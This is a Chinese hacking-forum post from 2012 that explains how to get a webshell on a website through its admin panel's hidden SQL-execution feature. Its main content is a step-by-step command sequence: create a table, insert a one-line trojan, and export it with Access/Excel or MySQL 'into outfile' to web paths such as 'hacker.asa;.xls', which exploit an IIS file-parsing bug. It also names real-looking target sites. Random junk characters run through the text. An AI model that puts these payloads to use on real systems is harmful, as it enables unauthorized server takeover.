好不容易进了后台,发现啥上传啊。备份啊多木有。0 A7 J$ z: H5 }: F
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的5 m4 H2 d+ i2 K
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,9 W; q6 k, g0 D; ]9 B, V4 {: b0 r
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:! l$ |$ N( H1 Y5 \$ w" j
1.create table cmd (a varchar(50))
5 w, y6 ~0 n, Z# G$ [( X2.insert into cmd (a) values (‘‘)9 U4 ~( e8 Q8 E
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd' q, ^$ [, Z5 [! {; A
(把表cmd的内容导出为物理路径的一个EXCEL文件)# Z' p: k* Y9 j6 I2 x1 D! T
4.drop table cmd
' {7 i( D9 k4 O2 _利用IIS的BUG成功拿到了WEBSHELL。3 I: n# q! T I* q J8 ]% b
( N H1 N) i3 m1 U2 R. d: W5 g直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
/ \* e h7 K8 o' A1 f1 N8 E5 A6 m. p5 {
SQL语句意思解释:1 l$ K d8 Y3 i9 { E' }
第一句
" V) s5 A7 s; h9 q6 q 建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
! ]* z* D- I9 X/ \! t, \5 Q8 [1 h" L/ K: @
第二句3 f, }5 }. J( H6 [3 P
在表cmd的a字段插入一句话木马
0 H- k% a# g& c( V, K6 A 第三句+ L2 T. y0 Z- O6 i
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
" Z- m3 G2 \, D* z: G3 ?# S# f9 S- X5 o1 w0 {- j
第四句
, J; x; S8 m F' x1 Q 删除建立的cmd表
2 I7 B, J* r" r7 D8 f" P
- \; Y. ?8 I2 R/ w 以下内容为测试:! \- ]8 T+ _+ x
Access利用后台SQL执行命令功能导出WebShell:
z0 O% a" a% f$ O; o9 ^4 Z1 n" S 这个更简单:- `: Y. B% ]" m: u# a1 T' F: [# f
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]: T8 R7 J$ q- c3 |+ I) T
或者
$ o2 n5 |( Z# F) Y5 k [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
* H7 k; ?' l7 p- X/ I8 ^9 J# B8 `! r- d' [( O5 g7 O5 l9 i# Q
后台有执行SQL语句功能(vote为已知表段)8 h1 d: y' F! p1 ?, t; r
希望对大家有所帮助拿shell的又一个思路* r1 m. u8 b' ~) W, k
|
发表于 2012-9-13 17:53:58
收藏
支持
反对